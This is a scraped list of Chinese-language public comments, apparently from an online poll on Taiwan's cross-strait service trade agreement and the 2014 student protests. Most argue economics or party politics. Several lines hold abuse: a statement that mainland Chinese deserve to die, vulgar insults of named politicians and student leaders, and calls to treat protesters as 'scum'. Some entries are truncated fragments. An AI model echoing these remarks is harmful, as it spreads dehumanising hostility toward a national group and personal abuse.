<br><br>人只有追求進步,競爭才能進步選擇通過服貿是勇士的表現,怕死服貿的人,只會內鬥的人,就是怕而不知選擇服貿之後的好。
<br><br>人們需要過日子,少點政治鬥爭,理念不能當鈑吃,多為台灣開啟新的商機,後代子孫才有出路
<br><br>人要肯定自己~勇於嘗試~成功就在嘗試裡
<br><br>人家賺你的錢,叫做欺人太甚。
<br><br>人家賺你的錢,叫做欺人太甚
<br><br>人家讓你賺錢,叫做收買人心。
<br><br>大局己定!不得不面對的大問題!不是不理逃避就能解決沒事了!唉!
<br><br>大家反的是黑箱服貿,題目設定有問題
<br><br>大部份不支持服貿的人,過與不過對他們而言生活上不至於產生太大變化
<br><br>大陸水果貴的驚人,任何消費比台灣高多了,趕快來賺人民?。
<br><br>大陸人就是該死
<br><br>大陸平均每年8%成長:13000
<br><br>大陸台灣人均GDP,大陸不到十年將25倍差距縮至4倍
<br><br>大陸台灣人均GDP:
<br><br>大陸沒那麼可怕,祇有增加自己的競爭力才是重點,台灣的東西是很好的要把它發暘光大,大家要團結才是對的。
<br><br>大陸消費比台灣高,他們來台投資會收益比在大隓少,沒錢的個人是不可能來台灣開小店,所以我們怕什麼
<br><br>大陸都蓋在沿海了
<br><br>大陸勞工基本薪資才台灣勞工的三分之一,服貿對大企業和財團最大受益對台灣勞工受害,為了利益成本企業肯定會大量聘用大陸工,以後台灣勞工薪資至少必需再下降兩成才找得到工作,如果跟薪資水平高過台灣薪資水平許多的國家簽服貿就沒有什麼顧忌,尤其跟大陸語言相通台灣勞工優越的技能更容易被取代,政府跟大陸簽署服貿除了要透明外必需要有周全配套才能贏得人民的信耐支持。
<br><br>大陸2020年/13000元正好是台灣1999年經濟高峰期。
<br><br>大勢所趨
<br><br>大概是國民黨發的誘導式民調
<br><br>小朋友不要再玩了
<br><br>十大建設當年還在戒嚴,社會反對聲音流言,高速公路是做給有錢人及高官開的,事實証明反對者的用意。
<br><br>又是政府一場騙局
<br><br>又要馬兒好又要馬兒不吃草
<br><br>三十年前與三十年後
<br><br>已經夠窮了還讓對岸的來搶錢
<br><br>已嚴重政府執法威信
<br><br>丫慧
<br><br>凡政策利大於弊就該去做.搞經濟要與世界接軌,國與國,區域與區域互動互利?生相乘效果,閉門造車,鎖國政策都注定要衰退不振.台?經濟唯有拋開藍?向國際貿易挺進才有希望.
<br><br>也來個核四議題手機公投吧?!
<br><br>也是改善台灣人民所得唯一途徑。
<br><br>也辦個核四公投如何?
<br><br>才有未來
<br><br>才能跟世界人才比拼
<br><br>市場唯有開放,才能帶來經濟的繁榮,資本市場才能活絡經濟,如共產國家封閉。全無經濟面可言。台灣最大的悲哀是政爭,最大的亂源是民進黨,走了二十幾年還在街頭鬥爭,真是不長進。
<br><br>市場跟進化論是一樣的,不想被淘汰就得一直進步。
<br><br>平安開心就好
<br><br>平和社會,安定人人心,治者自遵,人人感恩。
<br><br>本月28日清晨處理忠孝西路為反社會:常理、安寧、不守法、吃飽飯、禁食(減肥)等人們抗議事情,台北市長,警察們做的非常好,我們百姓給與肯定,給壹佰分辨的非常好,一定要有公權力使用,人喳欠缺公權力,須對症下藥,這樣才能叫有能,不是病貓,不能忠厚,不必談人性,它們不把您當人,政府,您就要把它當人喳,浪費良食。今天我們非常超級高興謝謝市長,警官們謝謝您們辛苦了中華民國萬?馬英九緦統加油,謝謝給我機會吐口氣,願大家平安喜樂
<br><br>本來就是各國合作
<br><br>未來十年:
<br><br>未來的商機及市場在那裡顯而易見。
<br><br>未來是地球村?還是台灣村?現在就要佈局!不是為了私利!或是不懂而為反對而反對!
<br><br>未來是幸福
<br><br>正義不能違法、邪不能勝正、他們是少數在霸凌多數、全民公敵!
<br><br>正義永遠會勝力的
<br><br>民主是比人頭,不是比拳頭。
<br><br>民主開倒車
<br><br>民進黨一到選舉就鬧,永遠因反對而反對,那
<br><br>民進黨和國民黨的各位精英:請您們組成一個真正為為台灣前途超越他們的新黨,現在的民進黨在我們的看法只是一群光為自己政治生命的不要臉的政客。善用族群分列的手段逼台灣走向一條黑暗貪窮沒有競爭力的死路,會贊同這種操作的台灣人的智能真的有這麼差嗎?
<br><br>民進黨亂國
<br><br>民進黨請停止胡鬧!!所謂的民主不是佔領或佔據公共場所 逼迫政府!
<br><br>民意不是這樣操縱的
<br><br>永敢做對的事 我支持服貿
<br><br>生於憂患 死於安樂 台灣需要更多的挑戰來磨練士氣與智慧
<br><br>生活就
<br><br>用這樣的文字遊戲出問題真是俾鄙!
<br><br>用選票制裁政治,勿浪費時間
<br><br>由李登輝到陳水扁到馬英九,台灣已經被一群政客搞到虛耗空轉26年,可是這些政客卻是我們投票選出來的。台灣的明天該何去何從?台灣人下一代的希望又在那裡?唉!加油台灣!
<br><br>目前台灣已經沒有任何產業養出一堆大學畢業生高不成底不就每個都想做老闆結果都是好吃懶做的啃老族
<br><br>目前的問題不在於過或不過,而是必須有有效的監督機制!
<br><br>伏冒糖漿治感冒的藥水,
<br><br>件用肉身阻擋坦克車的那個英雄。但其實他們一點都不勇敢,因為他們知道,這個年代,這個
<br><br>任何正義都不能背離公平與法律,也不能剝奪別人的權益,畢竟支持的人也有他們的權益。誰
<br><br>任何事一定要拼才會成功,就算不成功我覺得做過值得,想信自己。
<br><br>任何事都沒有十全十美
<br><br>任何服貿條件都靠政府把關,真的讓人不放心,圖利部分財團出賣大多數公民利益,似乎是目前政府給人的印象
<br><br>企業財團走了,又怪政府22K。
<br><br>先立法再審查!
<br><br>先有監督條件,再審服貿
<br><br>先是服貿揮劍自宮,再是反核斷決生日,日出東方唯綠不敗。
<br><br>先想想自己價值多少再來批評別人
<br><br>全球都跟大陸合作、為什麼我們要推開呢?
<br><br>世界一村,不要島國心態,不要怕競爭,要加強自己實力,不敢面對中國,也會碰到別的強國,韓國、日本、香港、新加坡、、等地的人,不也是對手?別把頭埋在沙子裡。
<br><br>世界未日快來 謝謝
<br><br>世界各國都在積極的簽署自由貿易協議拼經濟只有台灣在鎖國難道台灣人喜歡當台勞嗎?
<br><br>世界是愈來愈開放
<br><br>世界趨勢
<br><br>世界觀
<br><br>占有路權並非是沈默的公民認同和贊同的
<br><br>以人民利益為主,後以國家基礎為輔。
<br><br>以人來比喻,台灣的商法只是個高二學,半成熟又青澀過頭。
<br><br>以大數人的利益為先
<br><br>去死吧!
<br><br>去死吧政治操弄者!
<br><br>去年開始就在關注服貿議題 若真有意見應該在當時就表態而不是到現在才發言 去年的經記議題至今已變為政治議題 喪失本來價值 挺服貿而不站出去實在是簽與不簽一樣能有不同做法去進行一些轉變 若是不簽我一樣有管道能往外前進 但台灣某些產業會因時間而產生跟不上 台灣 太慢了
<br><br>去年12月,35位藍綠立委連署一份《幼兒教育及照顧法》修法提案,引起幼教界廣泛討論,此修正案主要對於15條與18條有所修正,提出「刪除五歲班需有一人以上為幼兒園教師」,意即幼兒園當中,二至五歲幼兒的班級皆不需設置幼教師;與「未具教保服務人員資格者,當現場有教保服務人員時,可協同教學,不受『未具教保服務人員資格者,不得在幼兒員從事教保服務』的限制」,對於幼兒教育師資限制有極大的調整,現已登錄進入教育委員會審議,且力主在過年後的新會期中快速通過。
<br><br>以前的抗議是靜坐默默的守候未來的曙光,現在的抗議卻是路過跟包圍,是誰帶出來的風氣很明顯不用在說,那麼他們是否也該站出來負責?不要只會叫別人負責,而自己的錯確不敢承認?
<br><br>去看長遠
<br><br>去查一下台灣對面大陸沿海有多少核電廠
<br><br>可以參考美國之音中文網對服貿的解讀,裡面都是大陸籍學者,經濟學人,教授.....
<br><br>可是不相信政府和政客會用來幫助老百姓
<br><br>可修正條款,但一定要過。
<br><br>可通過但不能黑箱!且我們是國家!
<br><br>可惡的帆神將錯誤的思維自以為是
<br><br>可悲的是,他們似乎不知道他們只是被綠營人仕擺佈的棋子,他們只是官兵交戰時被邪惡的一
<br><br>可憐的台灣人動動腦吧
<br><br>他不是經濟專家也不是兩岸關係專家,
<br><br>他只是想要利用這些議題來台獨來反馬
<br><br>他們其實還存在著許多青少年的幻想,幻想以後自己會是半?直樹,幻想自己是六四天安門事
<br><br>他講謊話已經是司空見慣的事!
<br><br>充實自己別怕跟別人競爭
<br><br>充實自我,團結合作,擴大競爭力,不怕外來挑戰,勇敢走出去,有什麼好怕的。自我封閉,不敢走出去,那跟自殺有什麼兩樣。
<br><br>另一方面
<br><br>只有白癡才會選死
<br><br>只有立場
<br><br>只有短期選票
<br><br>只是我認為服貿必須過、馬英九是白癡、林飛帆是一坨屎!
<br><br>只是利益財團,百姓無保障
<br><br>只要有本事,誰都不怕!
<br><br>只要扯上政治之後個個變變變變變騙子!!!
<br><br>只要走出去才會有希望,我們對自己有要求也願意提升自己,絕對可以跟別人一起競爭。讓更多的人認識台灣人,見識到台灣的實力。我愛台灣我想要讓台灣可以更好更進步更有競爭力!我選擇支持服貿
<br><br>只要適當讓對岸來台發展(當然也要有相當的限制及條件審核)就像我們的台商往大陸發展那樣,對經濟發展來說不一定是壞事!
<br><br>只能靠賀易
<br><br>只証明了 我們不敢闖
<br><br>只會鎖國沒用阿
<br><br>只會FB上說表示支持
<br><br>只對大企業有利,中小企業增加競爭,穫利不易生存都有問題,如何對員工提高收入。
<br><br>只
<br><br>台獨必敗!炎黃子孫,中華民族大團結!
<br><br>台獨學運社運一體,最後是害台灣
<br><br>台灣!加油!!我們不要再上演內耗的戲碼!!!
<br><br>台灣不作香港第二
<br><br>台灣不走出去只有死路一條,充實自己有實力,無需害怕與世界競爭
<br><br>台灣不服貿
<br><br>台灣不要被世界邊緣化!賭一把!
<br><br>台灣不要鎖國!
<br><br>台灣不能再封閉,必需對外開放,中國大陸市場大,台灣經濟要進步,必需合作,一直去害怕大陸吃掉台灣,怎麼不想想自己要進步,生意是要做到全世界,台灣才會進步,不是怕中國人來搶生億,那你怎麼不好好充實自己去搶大陸人生億,我們比他們早起步,怕什麼?
<br><br>台灣不能再亂了,沒有本錢,台灣加油
<br><br>台灣不能沈淪,?濟問題不能變成政治問題,若這樣鬧下去,有能力的、有國際競爭力的就出走了?
<br><br>台灣不能被邊緣化,我們要走向國際,有能力不怕競爭
<br><br>台灣不能鎖國!要走出去提昇國際競爭力!不要害怕!政府要妥適訂出辦法好好把關!
<br><br>台灣不能鎖國!
<br><br>台灣不需與中國簽服貿就已經到處是中國人了。而且過去20年沒有服貿,台商在中國就已經是過度投資了。目前中國急著簽服貿與馬先生的原因是相同的。他們只是希望藉由服貿將台灣鎖入中國。永不得超生。
<br><br>台灣不應鎖國,更毋須害怕中國。台灣加油!
<br><br>台灣內需小,看長遠就要走出去
<br><br>台灣水平會下降,變成第二個香港。
<br><br>台灣一天到晚搞分化,說年輕人賺不了錢買房,怎麼不先拼看看,不拼不知輸贏,學運學生還不是活再家人的保護傘之下,莫名奇妙的自以為事,政治好不容易才有現在的名主,難道要搞到戒嚴那幾個搞分化的才會知道痛苦嗎。
<br><br>台灣一定要走出去,加油!
<br><br>台灣人不怕死,怕死的逃離台灣吧
<br><br>台灣人不該一味的反對中國,而是以真正對台灣有利的方向去思考,服貿不等於賣國,只是試著藉此得到更多國際上的機會,我們應有的不是抱怨,而是充實自己,讓自己的競爭力提升。
<br><br>台灣人太軟弱了個個都怕,什麼時代了還區分的那麼清楚,還不是都是人,沒競爭那來的進步?被自己國家的政府壓榨那麼多年了,也虎濫那麼久了,還想談什麼民主
<br><br>台灣人民的精力充沛。要能與大陸競爭不要退縮 有攢才能有機會與世界接軌
<br><br>台灣人民要自救就先要爭取存活的空間
<br><br>台灣人民要深思的議題:
<br><br>台灣人民要犧牲多少?
<br><br>台灣人民悲哀啊??
<br><br>台灣人以前做生意拿著皮箱到世界各地
<br><br>台灣人有的是志氣怕什麼大陸人來就讓他當觀光客大陸貨來就讓他租倉庫放
<br><br>台灣人自己沒信心,所以只能靠阻擋滿足
<br><br>台灣人別再自我感覺良好了,大陸請不到員工,薪水快比我們高,消費更比我們高,沒人會來跟我們爭工作,要投資隨便一省都比我們好幾百倍,如果沒中國對台灣太好,早無路可走,輸人就認份吧,競爭輸人就努力點不是抗議,會被人取笑沒能力,錢不會天上掉下來,有工作的那有時間去抗議,學生不要每天守著電腦,手機就有競爭力,別逢中必反,有種敢跟中國斷交再說。
<br><br>台灣人沒有想像那麼弱,大陸企業早就進來,勇敢的接受挑戰
<br><br>台灣人很天真!不要工廠,卻要高薪,不要核電,卻要用電便宜。
<br><br>台灣人很有趣!
<br><br>台灣人最想要的是:錢多,事少,離家近,薪資倒退到22K,?有就業機會卻只怪政府。
<br><br>台灣人擁有創造力、競爭心、生命的品質、勤奮、愛心、膽識~
<br><br>台灣人 。。。大氣一點。。。我們曾經也賺了大陸不少錢了。。。不要怕競爭。。。。競爭才會進步。。。。我是在大陸打工的台灣人
<br><br>台灣已經快要跟不上世界的腳步了大家知道不知道!
<br><br>台灣已經是個國際認可的國家。 現階段因是先為年輕人的就業情況,老年人的居家照顧,中年人的退休機制做出完善的配套,而非一昧的追隨大企業。
<br><br>台灣已經越來越被邊緣化了!
<br><br>台灣市場真的很小,這點我們國民真的要認清!
<br><br>台灣平均每年3%成長:28000
<br><br>台灣必須找回失落的光明價值。
<br><br>台灣必須走出去
<br><br>台灣正向的力量,已經慢慢地流失。無法、無天、唯恐天下不亂。沒經濟沒工業沒工作,日子就真的~好過嗎?幾個王八蛋把台灣搞得要全部的人~陪葬嗎
<br><br>台灣永續?營
<br><br>台灣目前沒有什麼競爭力所以更不能自己又圍牆
<br><br>台灣主權優先
<br><br>台灣只是一個島,什麼都要跟國外比,但有些時候卻又封閉,不是很奇怪嗎?就像核4,不要它,那到底有什麼可替代,一天到晚?反對而反對,是公民的表現嗎?明知不能非核,卻不能加快核4的興建,而把不安全老舊的核1、2給停止,本墨倒置,總統在厲害也不過8年,可是台灣卻是我們的家園?,沒有向前進一步,還向後退,如何對的起先人,是否有錢人移民,留下的沈淪。我們都不是慈熹不要把自己鎖國,地球村是很快的
<br><br>台灣加油,馬英九加油
<br><br>台灣加油!
<br><br>台灣加油
<br><br>台灣加進去的有多少
<br><br>台灣有什麼可以選擇的嗎?只有向前衝,齊手合作,才會有明天啊!大家醒醒。
<br><br>台灣有一些偏激份子都在找機會見縫插針,為恐天下不亂製造社會動盪不安,打擊領導中心,完全以自我為中心,沒將民主法制放在眼裡,吃定政府不敢冒險來處置他們,讓這些星星之火更加放肆,形成燎原之勢,歸咎原因這股惡勢力吃定法制莫耐他何,另一股正義之聲又不站出來與之抗衡,以至後續之異議人士起之效法甚至使這些勢力結合。當務之急政府應該不能太過在意國際語論,我們是高度民主法制國家,不能讓民主過度超越於法制之上,逾越法制之行為經多次警告無法達成社會平和時就應立即採取非常手段來使得來不易的祥和被這群人破壞。
<br><br>台灣再不簽約就沒競爭力欸
<br><br>台灣如果持續封閉不與大陸經貿往來的話,我們台灣會無法與其他國家競爭,現在的這些學生只考慮到自己的私利,台灣可悲
<br><br>台灣別在把大門關起來了,早晚要面對面大陸或其他國家的衝擊,服貿是須要把關,但不是不動,再停止下去,就跟慈禧沒啥分別了,請台灣跟上國際的主流
<br><br>台灣走出去吧!
<br><br>台灣那麼多的電子新貴,?什麼沒出現一個像「小米機」那樣的老闆?也沒有出現像淘寶網一樣的老總?
<br><br>台灣沒有太大的資源,靠外銷賺外匯是經濟大本(試想沒有外匯買石油,台灣的產業會如何)。外貿極重要,誏人家來賺我們2300萬人的?,而我們去賺人家十億人口的?,應是正大於負。
<br><br>台灣沒有自由貿易就沒有未來,台灣再由打著民主的假面具胡鬧的學生反服貿,明眼人即知全然政治操弄,盲從的年輕人想當偶像或崇拜偶像無法無天製造社會亂源,誏我們自己的國家越來越接近菲律賓了,我是個年近七十而且是癌症三期的患者,餘命裡不想看見年輕人出外當台勞!今天之所以社會不安與動蕩全出之立法院,個個立委,政黨,院長都在為私利算計!「我反胡鬧」!我不再沉默!五月四日我會搭高鐵上台北,我己無未來!為的是年輕一代的將來!
<br><br>台灣沒有條件鎖國,沒有能力、自大、鄉愿、無恥政客操弄、墮落劣質媒體不專業,專業問題卻以政治操弄,沒有是非理性討論,台灣的前途將自己斷送在自己手裡。
<br><br>台灣沒有選擇權、只有迎合世界潮流、駕馭挑戰這潮流、勝者為王、敗者為寇、勇於挑戰、如果輸了也沒關係、至少努力、盡力過。
<br><br>台灣沒有鎖國的條件,可以監督平等機制,而不是儒弱的逃避,把挑戰民主法治的愚勇轉化為提升自己面對兩岸、國際競爭的能力,才真勇敢!
<br><br>台灣的民主素養仍舊不足。國民黨養軍公教,穩定過半數來統制台灣。可惜多數年輕人無未來.必必須等到老的一輩逐漸老去台灣才能真正公民正義.民主加油!
<br><br>台灣的特性價值一直沒有被發展出來!
<br><br>台灣的產品都以品質保証,為何會擔心世界競爭
<br><br>台灣的經濟必須靠大陸的特性?不妥吧!?就算統一后台灣不需要展現自己的經濟價值?如同現在大陸各省也不是在發展各省的特性與自主!?
<br><br>台灣長期拼政治
<br><br>台灣很小,要走出去,眼睛看遠一點
<br><br>台灣怎樣愈來愈像泰國了
<br><br>台灣是一個島國、小國,一直以來都是以出口貿易來支撐經濟,我們沒有條件鎖國,只有開放才有未來,我們須要一個跟世界接軌的貿易平台,讓企業有一個平等的競爭機會。 只有懶惰的人才會怕競爭,競爭才會進?進而提昇自己。
<br><br>台灣是小島國
<br><br>台灣是自主國家并不需要其他國家來代領台灣.台灣的未來由自己決定
<br><br>台灣要有競爭力,服貿過就過,台灣人才不怕競爭,沒競爭台灣怎麼會強大。
<br><br>台灣要自己作主 不要讓自私政府賣了家產
<br><br>台灣要向前走,要有競爭力,要再次創造?濟。
<br><br>台灣要走入國際服貿一定要過。
<br><br>台灣要走出去,不作國賊, 不犯國制,不謗國主,不漏國稅,愛台灣,不要傷害台灣,國富民才強,團結才有力量,攘外須先安內,放棄自私自利,放下名聞利養,共同為台灣的未來努力吧!
<br><br>台灣要走出去,不要自?於世外
<br><br>台灣要走出去,不要為反而反
<br><br>台灣要走出去不能成孤島,不能因為害怕而不面對,應該將有害或不利之處提出討論研商達成共識,以便做為談判取捨依據。
<br><br>台灣要走出去吧!好的人才別人欣賞就要讓他有更好的出路以後回來貢獻台灣,外面好的人才引進台灣讓台灣更國際化這樣才有競爭力,帆神,
<br><br>台灣要走出去路才能更寬,交流才能進步
<br><br>台灣要走出去
<br><br>台灣要走出去 後代才有希望 逢中必反是自私的行為
<br><br>台灣要勁爭
<br><br>台灣島已經不是航空母艦~而是迅速沈沒的漢國遊輪.........
<br><br>台灣唯有透過開放與競爭才有未來!
<br><br>台灣唯有開放,面對競爭,與世界作朋友,才可大可久。
<br><br>台灣接軌世界
<br><br>台灣現有法律和政策,都不足以讓台灣中小企業在服貿中生存下來,?不定連大企業也會吃虧,對政府失去信任感,現實是台灣的商法不夠成熟。
<br><br>台灣現在已經是斷了線的珍珠,服貿再不過,繼續鎖國,那就要自給自足(問題是大陸地大物產豐富可以這樣,台灣可以嗎?) 大家等死吧!
<br><br>台灣現在被一群來自萬聖節的魔鬼搗亂中"My way or no way"不給糖就搗蛋, "牠們"上癮了,媒體在推波助瀾、反政府的媒體、教授、學者、律師、醫生、、、不斷的包容萬盛魔鬼的非法行為,其實就是變相支持與鼓勵這種亂象,這些萬盛魔鬼的背後還有大魔神在撐腰,只要國家亂、政府無政績、下一次便會換人執政、現在大多數人沒有言論自由,因為少數暴力是台灣現在的主流,趕快亂到台灣無可收拾的地步、當經濟亡國的時候、也是交出政權的時刻、到時不再有藍綠、只有紅色領政一言堂、到那時候台灣人民才會好好唸書好好工作好好生活。
<br><br>台灣被那些人搞的亂七八糟,抗議一大堆,能不能還給台灣安靜的社會。我需要安靜,別再鬧了!
<br><br>台灣經濟在幾年前已漸漸邊緣化
<br><br>台灣經濟垮了,又怪政府無能。
<br><br>台灣經濟起飛的那年代,靠的是走出去與各界做外錥生意,才有今日的基礎,並非鎖國而得來的,大家可回憶一下,但現在抗服貿者,對這年代是空白的,因為他們未出生。
<br><br>台灣像是汪洋中一條船舶,要勇敢向前移動,不要怕狂風巨浪,找尋光明的前途,否則劃地自限,如同溫室花?,無法永續!
<br><br>台灣需要走出去,坊間太多懶人包都是誤解、謠言。請多做功課判斷
<br><br>台灣與?界各國做生意不能拒生意於千里之外,何況出超大陸最多
<br><br>台灣學生太弱了,沒實力的學生才敢在台灣嗆聲,不敢面對現實環境的競爭,沈默的大眾加油
<br><br>台灣錢淹腳目
<br><br>台灣獨立
<br><br>台灣應加入世界的經濟,更勇敢的面對世界
<br><br>台灣應該走出去,不要變鎖島
<br><br>台灣藍綠均無法治國,他們只有吵鬧,沒有重整智慧與應對手腕
<br><br>台灣
<br><br>台?人民不能小看230萬人在世界上的存在及地位。也不能任何事都不能形成一個主動的驅勢。而生存在恐懼之中。台灣需要自立自強。需要強盛需要引領中國大陸學習台灣的民族。這些價值是大陸怕台灣而不是台灣怕大陸。?健在自己是否能創造風潮。靠打躲避球遲早被打死。怕服貿的人是弱者。是一群不能上進的人。
<br><br>台?人民必?要能?有??力!自己?造出?未?。 ?心是?有用的。
<br><br>加油。
<br><br>加油台灣
<br><br>加油臺灣!
<br><br>加油
<br><br>加油
<br><br>加油!! 支持社會正義
<br><br>外交上本來就無永遠的敵人朋友 只要是對國家好 為何不簽 如果只要是對岸都反對 這樣就我看來只是盲目的仇恨
<br><br>外國那麼大的國家,台灣只是一個小國家,外國那麼多人要擠入台灣這個小地方,台灣人肯定被擠到跳海
<br><br>早死晚死!都會被這些不食人間煙火的搞死!
<br><br>有本事就不怕。
<br><br>有企業管理經驗的人都會認同,這群我們眼裡的孩子,別說現在,就算一兩年畢業後進入職場,
<br><br>有事嘛?當然死
<br><br>有沒有毒 有沒有過期 我不能了解嗎
<br><br>有沒有統計表格能知道這份調查的族群
<br><br>有時候在事情上太過執著單一角度較容易有盲點,就像家人之間的相處往往爭吵過多包容太少一樣,當跳脫出家人角色,往往更容易處理好事情。所有事情都有值得肯定的地方也有不值得鼓勵的地方,我並不覺得大眾媒體或者是街頭群眾能夠提出什麼較?宏觀的觀點,但當社會議題有了論述空間之後才有可能見到一些希望,由衷祈求台灣不同世代的人都能夠在有生之年,得到較為開闊和包容異己的心,一同努力共勉之。
<br><br>有差嗎出事臺灣也是躲不掉
<br><br>有能力,怕什麼?!
<br><br>有能力,服貿並不可怕。
<br><br>有能力的人還是有辦法 相信自己
<br><br>有能力者不怕競爭,沒能力者等人救濟又要懆
<br><br>有能力還鳥阿六仔
<br><br>有這些狗官在立法院、行政院和總統府,他們說的話能信嗎?看看ECFA把台灣搞的更好還是更慘就知道了!
<br><br>有殘體字,露餡了。
<br><br>有跨越有新希望
<br><br>有義意的投票,讓沈默的人能有發聲的管道,請愛示威的人也以民主的方式,聽聽另外的聲音。
<br><br>有種憑良心做人!這麼愛大陸就自己去含人家懶趴不要脫台灣人下水
<br><br>有機會就要爭取,不要連找機會時機都沒有!
<br><br>有膽抗爭沒膽競爭,至少我個人不怕!
<br><br>有點自信嘛
<br><br>有競爭,有進步,台商有保障
<br><br>有競爭力的人需要的是更廣大的市場,只有沒競爭力的人需要躲在家裡受爸媽的保護!
<br><br>有競爭力國家才有救
<br><br>有競爭就有機會,劃地自限,關起門來自己玩是不會有前途的!
<br><br>有讀過經濟學的都知道,服貿過z>b
<br><br>死。
<br><br>死…
<br><br>死死死
<br><br>死是沒過會死嗎?
<br><br>死冥燼黨不要因自己選不上,就一直找執政黨麻煩一直大吵大鬧,什麼事就故意因反對而反對,死冥燼黨早晚會有報應
<br><br>死
<br><br>老人家常告誡「死路一條」,服貿死,活著的人就如活死人,服貿過,活著的人才活著有前途、未來
<br><br>而不是一味只考慮大企業的利
<br><br>而不是甚麼都反對的「 選舉黨 」。
<br><br>而中國欠缺的所有品質和人性,台灣都具備,且遠遠超過至少一個世代,為什麼要懼怕?服貿是大路,是展現台灣價值的未來希望,不但沒有封閉的理由,而且政府要做為台灣人民的後盾,台灣若是艘經濟的航空母艦,服貿就是航線!
<br><br>而且反服貿運動最後變成臺灣獨立?這擺明是在鬧台獨阿!
<br><br>而後者我認為對社會經濟的產值會大於前者
<br><br>而是要以實際行動為証明
<br><br>自己努力才是存活的方法。?化自己??能力。加?自己知??文。杞人?天是?有用的。??台?一?安宁的社?。
<br><br>自己沒能力才怕別人來
<br><br>自己國家自己救!
<br><br>自由貿易不要鎖國台灣人怕什麼
<br><br>自由貿易不能解決根本問題。
<br><br>自由貿易是普世價值
<br><br>自由經濟才是國家之福
<br><br>自由經濟區也要死!
<br><br>自由競爭
<br><br>自以為新潮喔?
<br><br>自古鎖國政策終致禍害愚蠢至極
<br><br>自我感覺良好太久了
<br><br>自我矮化的人才會反對服貿!
<br><br>自救個屁,還沒救完台灣就死了。
<br><br>至少有機會比比看
<br><br>何來民主正義
<br><br>佔據立法院!搞學運胡鬧?可以有誰告訴我們服貿的壞?沒有!兩個蔡英文的假學生的幹部進行破壞政府威信!實質為下次競選鋪路?
<br><br>但,當對象是中國,整個問題就已經超脫經濟層面了!
<br><br>但方式跟條例需要透明公正化
<br><br>但欠缺市場規模和契機!台灣人在世界走透透,而中國就在我們的旁邊,躲都躲不掉,為什麼要反對?台灣人是中國的光!為什麼要害怕?
<br><br>但人民不能故步自封,製造敵對。
<br><br>但希望內容是真的為我們好
<br><br>但是臺灣在那個爛總統的領導下
<br><br>但是學生的學運也有問題!
<br><br>但是關係到國家外交、區域安全、經濟發展的議題,這群懵懵懂懂的青澀學子就稍嫌稚嫩了。
<br><br>但是 臺灣 中華民國 不行/沒這本錢
<br><br>再不與中國往來....不知道牠們還會搞出什麼招數對付我們?!
<br><br>再吵吧……再鬧吧……還不夠亂嗎!大家一起等死吧、落後別的國家那麼多、也不打緊、笨蛋一群、笨蛋。
<br><br>再來一個鎖國念頭,那麼台灣的後代子孫是真得死在自己的手裡而不是中國害的!
<br><br>地球村世界經濟效益、台灣沒本錢也不能自主自給、需面對現實爭取國際貿易利益。
<br><br>再就現今的層峰主管們,要有擔當!要有魄力!要有責任感!使命感!凡是應多用心,錯了就要改正!就要面對!一切以「民」為主,以「生」為要!
<br><br>再鬧啊!瘋了!什麼都沒有的國家再不走出去!吃屎吧!
<br><br>在不清楚條例與未公開前半知半解無立法約束、就算立法也該透明化
<br><br>在台灣還沒找到替代能源前,核能是必要的,但是我不信任馬政府所蓋出來的核四安全無慮,所以我寧願希望停建核四,畢竟寧缺誤濫!!
<br><br>在著邪惡的期望,期望事情越鬧越大,期望場面失控,期望這群無知的學生血濺街頭,讓執政
<br><br>多年後競爭對手韓國已超越太多
<br><br>多年前四小龍之首的台灣
<br><br>好好賺錢存錢
<br><br>好像佔領立法院很厲害
<br><br>好
<br><br>如此教獸教出一群野獸己無法無天
<br><br>如果今天是和美國?日本等國簽訂類似的條約?台灣的朋友們,是贊成還是反對?經濟歸經濟,任何條約,必定有獲利者也有受害者,我們是否應該要求政府制定補救措失,方為正著?經濟的事用政治來解決,會玩死一個國家的。受害的卻是我們的子孫啊!所有的企業都不能獲利,誰還要來投資?沒投資,即將畢業的學子們,你們的就業在那?是否又怪政府沒搞好經濟?韓國和大陸簽一堆協定,請問韓國經濟很慘嗎?就業率低嗎?國民所得比台灣低嗎?戒急用忍,讓台灣閉?了廿年,有那一個國家用廿年只搞政治鬥爭而忽視經濟的發展卻還能存活?台灣的朋友們,真該感謝上蒼保佑這塊土地和子民。願上蒼能?續保佑大家。
<br><br>如果反對黨什麼政策都反對而沒有代替方案,以後要如執政?!
<br><br>如果目中無人成為真理,以牙還牙就是義務。
<br><br>如果你的信念是民主、自由、進步,就要走開放的道路,當然要接受服貿,否則是自我矛盾的。
<br><br>如果沒有相當的深入了解狀況請不要製造社會不安
<br><br>如果服貿過的話真的會?凸凸凸
<br><br>如果政府不行 自己來
<br><br>如果政府會做事會為台灣著想,我想過不過就不是重點了
<br><br>如果政黨不行 我們來
<br><br>如果要過一定要有配套措施
<br><br>如果從我們期許青少年的角度來看,不但沒有只顧著玩樂,還會去關心國家社會是值得鼓勵的。
<br><br>如果過是自己找死絕望不能過
<br><br>如果學運能取代全國人民的意見,那麼全國老百姓選舉出來的民意代表,全部?散由學運代表做全國最高的民意機構好了嗎?其學運有夠獨裁,放蕩.全世界找不到一個民主國像台灣這樣混亂!
<br><br>如果擁核的一方也要求降低通過門檻,是不是覺得合理。
<br><br>如果權貴不行 大家闖
<br><br>同意服貿,但不同意內容。譬如二級通訊網絡之開放,有個資、國安之慮!
<br><br>各個週邊鄰國經濟工業科技能力都在加速進步中
<br><br>安安
<br><br>吃大便
<br><br>吃飽太閒
<br><br>因為台灣在這二十年來,一直都處於原地踏步狀態甚至有些讓人感到已退步了,或許有一些人也覺得台灣在民眾間的經濟狀態中只處於退步,從未有過讓民眾有收入的滿足感的進步。或許從商的角度來講應該是沒有永遠的敵對關係,也沒有永遠的友好關係吧。
<br><br>因為服貿一旦通過 ,台灣年輕人未來必須和教育環境截然不同的對岸學生競爭,以導致台灣傳統企業作業方式改變,而無法保留台灣傳統所以
<br><br>回歸民主政治制度一代議政治
<br><br>帆神廷神跟不不懂經濟
<br><br>年輕人更要讓自己技能提昇
<br><br>希望反對抗議者可以衡量大局,考慮後果,並且尊重不同的意見及聲音。台灣不是只有抗議者的,他們不能代表全體台灣人民。
<br><br>希望先修憲,在立法,服貿寧願不過,也不要糊塗亂過,請毀掉自由經貿區(擺明在玩兩岸統一)
<br><br>希望台灣的年輕人別為了怕與世人競爭,然、選擇了逃避。往後世界的舞台在大陸、別生活在4月1日(自愚可以、愚人不可行)裡,祝好運!
<br><br>希望台灣能好
<br><br>希望我們不要做井底之蛙?!服貿要過.台灣才能跳出!才能與世界並行!經濟才能進步!百姓才能安樂!
<br><br>希望把結果公佈出來給大眾知道
<br><br>希望能審查別黑箱作業
